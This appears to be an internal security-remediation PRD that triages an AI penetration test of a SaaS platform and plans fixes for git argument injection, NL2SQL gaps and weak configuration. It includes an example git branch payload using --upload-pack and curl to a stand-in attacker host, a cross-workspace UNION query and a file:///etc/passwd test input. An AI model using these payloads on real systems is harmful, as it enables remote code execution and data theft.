PRD-70: Security Hardening — Pen Test Remediation
Version: 1.0 Status: Draft — CRITICAL PRIORITY Priority: P0 Author: Gar Kavanagh + Auto CTO Created: 2026-03-03 Updated: 2026-03-03 Dependencies: PRD-44 (Security Hardening Architecture — 12 of 45 stories complete), PRD-18 (Credential Management — COMPLETE), PRD-61 (NL2SQL V2 — COMPLETE) Source: Shannon AI Penetration Test Report (2026-03-03), 4.4 hours, $90.83, 12 phases completed Branch: fix/pentest-remediation-70
Executive Summary
On 2026-03-03, the Shannon AI penetration testing framework completed a full-scope assessment of https://ui.automatos.app covering authentication, authorization, XSS, SQL/command injection, and SSRF. Shannon was unable to breach the external perimeter — zero vulnerabilities were exploited from an unauthenticated position. Clerk auth, the waitlist system, and Next.js framework protections held.
However, Shannon identified 8 injection vulnerabilities and 21 authorization concerns through code analysis that become exploitable once an attacker has a valid account. Since Automatos is a SaaS platform where every paid user gets an authenticated session, "requires authentication" is not a mitigating factor — it's the baseline.
Independent Verification Results
I independently verified every Shannon finding against the actual codebase. Shannon's analysis was partially based on PRD documentation rather than live code (they acknowledged this limitation). Here's what changed after verification:
7 command injection (git clone)
CRITICAL
CRITICAL — Confirmed
3 distinct code paths, all missing -- separator, branch params unvalidated
1 SQL injection (NL2SQL)
CRITICAL
MEDIUM — Downgraded
PRD-61 fix catches mutations in subqueries. Real risk is UNION cross-workspace reads
Auto-admin @automatos.app
CRITICAL
LOW — Downgraded
Backend removed this (clerk.py:196). Frontend-only — doesn't grant backend access
Frontend-only admin auth
CRITICAL
FALSE POSITIVE
Backend has _assert_admin() on every admin endpoint
21 IDOR / authz issues
HIGH (21 items)
LOW — Downgraded
Backend consistently filters by workspace_id on all CRUD operations
4 SSRF via git clone
HIGH
CRITICAL — Same as cmd injection
Same root cause as command injection findings
JWT audience validation
MEDIUM
MEDIUM — Confirmed
Configuration check needed
Generated images proxy SSRF
MEDIUM
FALSE POSITIVE — Confirmed
Next.js framework protection blocks exploitation
Bottom line: Shannon overcounted by basing findings on PRD docs instead of actual code. The real attack surface is smaller but the git clone vulnerabilities are genuinely critical. This PRD fixes everything that actually matters.
What's Actually Critical
Git argument injection — 3 live code paths allow RCE via
--upload-packflag injection. Authenticated users can execute arbitrary commands on the backend server.Missing
--separator — No git subprocess call uses--to delimit options from positional arguments. URLs starting with--are interpreted as flags.NL2SQL cross-workspace reads — The validator prevents mutations but doesn't enforce workspace isolation in SELECT queries. UNION-based cross-workspace data exfiltration is possible.
Database SSL not enforced — Connection strings lack
sslmode=require.Frontend auto-admin remnant —
role-context.tsx:44-48still grants admin UI to @automatos.app emails even though the backend ignores it.
1. Findings Detail
1.1 CRITICAL: Git Argument Injection (3 Code Paths + 1 Script)
All paths share the same root cause: user-controlled branch parameters are passed to git subprocess calls without validation, and no -- separator is used.
Path A: Skills Import (skill_loader.py) — HIGHEST RISK
skill_loader.py) — HIGHEST RISKCritical discovery: The skills import endpoint at api/skills.py:183 has NO admin check. ANY authenticated user can import git repos. Skills auto-activate immediately with no approval workflow (unlike plugins which require admin approval + security scan).
What's validated: validate_git_url() at line 96 checks the URL hostname against an allowlist (github.com, gitlab.com, bitbucket.org). This blocks arbitrary URLs but does NOT prevent branch parameter injection.
What's NOT validated:
branchparameter — no validation at all.--upload-pack='bash -c "curl attacker.com"'as branch value gives RCE.No
--separator before positionalgit_urlargument
Contrast with Plugins: The plugin import path (POST /api/admin/plugins/import-github) correctly requires _assert_admin() at line 507 of admin_plugins.py, runs a full security scan (static + LLM), and requires admin approval. Skills bypass all of this.
Decision: Lock skills import to admin-only for now. Future: build a safe user-facing import flow with full security scan + marketplace approval, matching the plugin pipeline.
Path B: CodeGraph Indexing (codegraph_service.py) — KEEP BUT SECURE
codegraph_service.py) — KEEP BUT SECUREWhat's validated: Nothing. The IndexGitHubRequest Pydantic model accepts any string as github_url — no URL parsing, no domain check, no protocol check.
What works well:
Workspace scoping is enforced at DB level — all codegraph tables filter by
workspace_idClones into
tempfile.mkdtemp()— cleaned up on success and failureDuplicate prevention — won't re-index if status is already "indexing"
What needs fixing:
Add URL validation (HTTPS only, github.com/gitlab.com/bitbucket.org only — this IS a code indexing tool)
Add branch validation (no leading
-)GitPython's
Repo.clone_from()passesbranchto git CLI — same injection riskAuth token injected into URL at line 452 — if exception leaks the URL, token is exposed
Path C: Workspace GitHub Clone (workspace_github.py) — BEST ISOLATED
workspace_github.py) — BEST ISOLATEDAlready well-secured:
CloneRequestPydantic model has@field_validator("repo_url")— validates HTTPS only, allowed hosts (github.com, gitlab.com, bitbucket.org), strips embedded credentialsRuns in separate
workspace-workercontainer (not the backend server)Per-workspace filesystem isolation (
/workspaces/{workspace_id}/)Backend has read-only mount; worker has read-write
Command whitelist blocks
sudo,su,mount, etc.Path traversal prevention via
resolve_safe_path()5GB quota per workspace
Workspace access verified at line 180
What still needs fixing:
branchparameter has no validation — same leading-injection riskWorker's
git clonecommand doesn't use--separatorThese are lower severity because the worker container has limited blast radius vs. the backend server
Path D: Plugin Harvest Script (harvest_plugins.py)
harvest_plugins.py)Lower risk: Standalone script, not an API endpoint. URLs come from hardcoded CURATED_REPOS list. Plugins go through PluginUploadService with full security scan. Fix for completeness.
1.2 MEDIUM: NL2SQL Validator Gaps
Shannon's claim: "Regex validator fails to detect nested subqueries with mutations."
Actual state: The validator at modules/nl2sql/query/validator.py:203-210 was fixed in PRD-61 (US-009). It strips string literals, then checks DENY_KEYWORDS (\bINSERT\b, \bUPDATE\b, \bDELETE\b, etc.) across the ENTIRE SQL including subqueries. Nested INSERT INTO ... RETURNING * WOULD be caught because \bINSERT\b matches the keyword even inside a subquery.
What IS still vulnerable:
UNION cross-workspace reads —
SELECT * FROM users WHERE workspace_id = 'mine' UNION SELECT * FROM users WHERE workspace_id = 'theirs'. No mutations, passes all keyword checks. The table allowlist helps (line 214-223 validates tables against schema metadata), but if the NL2SQL data source includes shared tables likeusersorworkspace_members, cross-workspace reads are possible.RETURNINGnot in deny list — WhileINSERTis denied, if an LLM generates SQL using onlyRETURNINGin a creative way, there's no catch.Regex fundamentally can't parse SQL — Edge cases will always exist. AST-based parsing is the correct approach.
Real severity: MEDIUM (not CRITICAL). The mutation protection works. The residual risk is cross-workspace SELECTs.
1.3 LOW: Frontend Auto-Admin Remnant
Backend status: Removed. orchestrator/core/auth/clerk.py:196 has the comment: "Domain-based auto-admin was removed for security (see PRD-43 US-025)."
Impact: Frontend shows admin UI to @automatos.app users, but all admin API calls go through _assert_admin() which checks system_role from the Clerk JWT, not email domain. An attacker registering with @automatos.app email gets admin UI but every admin API call returns 403.
Still should be fixed: The frontend check should be removed to prevent confusion and to align with the principle that security decisions should never happen in the frontend.
1.4 FALSE POSITIVES (Shannon Overcounts)
21 IDOR / authorization issues: Backend verification confirms comprehensive workspace filtering:
agents.py:611—Agent.workspace_id == ctx.workspace_iddocuments.py:501—Document.workspace_id == ctx.workspace_idworkflows.py:387—Workflow.workspace_id == ctx.workspace_idchannels.py— parameterizedworkspace_idin raw SQLAdmin endpoints —
_assert_admin()on every handlerChat endpoints —
user_idownership checks
Shannon could not test these from an unauthenticated position and classified them based on PRD documentation rather than actual code review. The backend implementation is sound.
Frontend-only admin auth: Backend admin_plugins.py and admin_prompts.py both implement _assert_admin() — a function that checks ctx.user.system_role in ("admin", "super_admin") on every request. This is not frontend-only.
1.5 MEDIUM: Infrastructure Gaps (From Data Security Audit)
Database SSL
No sslmode in DATABASE_URL
Data in transit unencrypted between backend and Postgres
Redis TLS
No TLS configured
Cached data (sessions, rate limits) unencrypted
Redis dangerous commands
FLUSHDB, FLUSHALL, CONFIG available
If Redis exposed, full data wipe possible
Audit service
Stub file (199 bytes, no implementation)
No audit trail for security-sensitive operations
JWT audience validation
Optional — may not be configured
Cross-Clerk-app JWT reuse if CLERK_AUDIENCE unset
2. Remediation Plan
Phase 1: Critical Fixes (Week 1) — Stop the Bleeding
These fixes prevent RCE on the backend server. Ship immediately.
FIX-01: Secure Git Operations (ALL code paths)
Create: orchestrator/core/security/git_sanitizer.py
Modify files:
api/skills.py
Add _assert_admin(ctx) check to import_git_repository() at line 183. Skills import is admin-only until a safe user-facing flow is built.
P0
modules/agents/services/skill_loader.py
Replace inline validate_git_url with import from git_sanitizer. Add validate_branch() call before _git_clone(). Use build_git_clone_cmd() in _git_clone().
P0
modules/codegraph/codegraph_service.py
Add validate_git_url() + validate_branch() before Repo.clone_from(). Validate URL is HTTPS + allowed domain (this is a code indexing tool — only git hosts make sense).
P0
api/workspace_github.py
Add validate_branch() before building task step. URL already validated by Pydantic model.
P1
services/workspace-worker/executor.py
Add -- separator to git clone command in _git_clone() handler (line ~380). Add validate_branch().
P1
scripts/harvest_plugins.py
Add validate_git_url() before clone_repo(). Use build_git_clone_cmd().
P2
Key principles:
Every git URL is validated: HTTPS only, domain allowlist, no leading
-Every branch name is validated: alphanumeric +
./_-, no leading-Every
subprocess.rungit call uses--separator before positional argsOne module, one import — no per-file reimplementation
Skills import locked to admin-only (matches plugin import pattern)
FIX-02: Remove Frontend Auto-Admin
Modify: frontend/contexts/role-context.tsx
Delete lines 44-49 (the @automatos.app domain check). Admin role should come exclusively from Clerk publicMetadata.role.
FIX-03: Enforce JWT Audience Validation
Modify: orchestrator/core/auth/clerk.py
Ensure CLERK_AUDIENCE is set and validated. Add a startup check:
Add to deployment checklist: CLERK_AUDIENCE must be set in all environments.
Phase 2: Defense in Depth (Week 2) — Harden the Perimeter
FIX-04: NL2SQL Query Hardening
Modify: orchestrator/modules/nl2sql/query/validator.py
Add
RETURNINGto deny list:Enforce workspace isolation at SQL level:
Add CTE detection:
Future: Replace regex with AST parsing (Phase 3). Use
sqlglotorpglastto parse SQL into an AST and validate the tree structure rather than string patterns.
FIX-05: Database Connection Security
Modify: orchestrator/config.py and docker-compose.yml
Add
sslmode=requireto DATABASE_URL:Disable Redis dangerous commands in
docker-compose.yml:Note:
CONFIGrename breaks Redis introspection tools. Only apply in production. Use an environment-conditional redis.conf if needed.
FIX-06: Audit Service Implementation
Modify: orchestrator/core/services/audit_service.py
The audit service is currently a 199-byte stub. Implement actual audit logging for security-sensitive operations:
Write to the audit_logs table (already defined in schema). Include: timestamp, user_id, workspace_id, event_type, resource_id, ip_address, user_agent, result (success/failure), and metadata JSON.
Phase 3: Proactive Security (Weeks 3-4)
FIX-07: Rate Limiting per Workspace
Modify: Rate limiting configuration
Current: 60 req/min per IP (global). Add per-workspace rate limiting for sensitive operations:
Git clone (any path)
5/hour per workspace
NL2SQL query
30/min per workspace
Admin operations
20/min per user
Plugin/skill import
3/hour per workspace
FIX-08: CSP and Security Headers
Modify: frontend/middleware.ts or Next.js config
Verify and enforce:
Content-Security-Policy— restrict script sources, prevent inline scriptsX-Content-Type-Options: nosniffX-Frame-Options: DENYReferrer-Policy: strict-origin-when-cross-originPermissions-Policy— disable unused browser features
FIX-09: Dependency Audit
Run pip audit and npm audit / yarn audit to identify known CVEs in dependencies. Fix or pin affected packages.
FIX-10: Scheduled Shannon Re-Test
After all fixes are deployed, re-run Shannon with authenticated test credentials to:
Verify all injection paths are blocked
Test IDOR/authz with actual authenticated sessions
Validate workspace isolation under adversarial conditions
3. File Impact Table
New Files
orchestrator/core/security/__init__.py
FIX-01
Security utilities package
orchestrator/core/security/git_sanitizer.py
FIX-01
Centralized git URL/branch validation
orchestrator/tests/security/test_git_sanitizer.py
FIX-01
Unit tests for git sanitizer
orchestrator/tests/security/test_nl2sql_validator.py
FIX-04
Adversarial SQL injection test cases
Modified Files
orchestrator/api/skills.py
FIX-01
Add _assert_admin() to skills git import endpoint — admin-only until safe user flow exists
orchestrator/modules/agents/services/skill_loader.py
FIX-01
Replace inline validation with git_sanitizer imports; add -- separator; add branch validation
orchestrator/modules/codegraph/codegraph_service.py
FIX-01
Add URL/branch validation before Repo.clone_from(); HTTPS + domain allowlist
orchestrator/api/workspace_github.py
FIX-01
Add branch validation before task submission (URL already validated by Pydantic)
services/workspace-worker/executor.py
FIX-01
Add -- separator + branch validation in _git_clone() handler
orchestrator/scripts/harvest_plugins.py
FIX-01
Add URL validation; use build_git_clone_cmd()
frontend/contexts/role-context.tsx
FIX-02
Remove @automatos.app auto-admin logic
orchestrator/core/auth/clerk.py
FIX-03
Enforce CLERK_AUDIENCE validation
orchestrator/config.py
FIX-03, FIX-05
Add CLERK_AUDIENCE config; add sslmode to DATABASE_URL
orchestrator/modules/nl2sql/query/validator.py
FIX-04
Add RETURNING/COPY/EXECUTE to deny list; add CTE detection; add workspace filter injection
docker-compose.yml
FIX-05
Disable Redis dangerous commands
orchestrator/core/services/audit_service.py
FIX-06
Implement actual audit logging (replace stub)
4. Test Plan
Unit Tests (FIX-01: Git Sanitizer)
Unit Tests (FIX-04: NL2SQL Hardening)
Integration Tests
Submit skills import with --upload-pack as branch
Returns 400, not 500 or RCE
Submit codegraph index with file:///etc/passwd as URL
Returns 400
Submit workspace clone with internal IP as URL
Returns 400
Admin endpoint without admin role
Returns 403 (backend enforced)
NL2SQL with UNION cross-workspace query
Returns validation error
Regression Test (Post-Deploy)
Re-run Shannon with authenticated test credentials. Provide:
2 test accounts in different workspaces (for IDOR testing)
1 admin account (for vertical escalation testing)
1 regular user account (for privilege escalation testing)
5. Deployment Checklist
Pre-Deploy (Environment Config)
Deploy Order
FIX-01 (git sanitizer) — Ship first, blocks RCE
FIX-02 (frontend auto-admin removal) — Quick frontend deploy
FIX-03 (JWT audience) — Config change + code
FIX-04 (NL2SQL hardening) — Backend deploy
FIX-05 (DB/Redis security) — Infrastructure change, schedule maintenance window
FIX-06 (audit service) — Backend deploy
FIX-07 through FIX-09 — Iterative hardening
Post-Deploy Verification
6. Architecture Context: Why Each Path Has Different Risk
Understanding the isolation model changes the severity assessment:
Path C (workspace clone) is the only one with meaningful isolation. Paths A and B execute git on the backend server where environment variables contain database credentials, API keys, and secrets. An --upload-pack injection on Path A or B gives RCE with full access to POSTGRES_PASSWORD, OPENROUTER_API_KEY, CLERK_SECRET_KEY, etc.
Skills vs. Plugins: The Access Control Gap
Import endpoint
POST /api/v1/skills/sources/git
POST /api/admin/plugins/import-github
Auth requirement
Any authenticated user
Admin only (_assert_admin())
Security scan
Basic pattern matching (8 patterns)
Full static + LLM-based scan
Approval workflow
None — auto-activated
Admin approval required
Activation scope
Global (all workspaces)
Per-workspace enablement
Assignment
Direct to any agent
Via AgentAssignedPlugin
The fix: Lock POST /api/v1/skills/sources/git to admin-only immediately. This matches the plugin import pattern and removes the unauthenticated-user-to-RCE chain. Future: build a safe user-facing skill import with the same security scan + approval workflow that plugins use.
7. Shannon Assessment Quality Notes
Shannon ran a thorough 4.4-hour assessment across 12 phases. Key observations:
Strengths:
Excellent external perimeter testing — confirmed Clerk auth is robust (rate limiting at 5 attempts, Cloudflare Turnstile CAPTCHA active, bot detection working)
Thorough injection analysis — identified every git clone code path
Good methodology — proof-by-exploitation focus, no assumptions
Honest about limitations (documented that backend code analysis was based on PRDs, not actual code)
Limitations:
Based several backend findings on PRD documentation, not actual Python source (acknowledged in report)
Overcounted authorization issues (21) that were actually properly implemented in the backend
Classified NL2SQL validator as fully bypassable — missed the PRD-61 fix that catches mutations in subqueries
Auto-admin finding was based on frontend code only — didn't verify backend enforcement
Recommendation: Next Shannon run should:
Be given read access to the actual
orchestrator/Python sourceBe provided authenticated test credentials (bypass waitlist)
Run an internal-scope test focused on the 21 authz items that couldn't be tested externally
Last updated

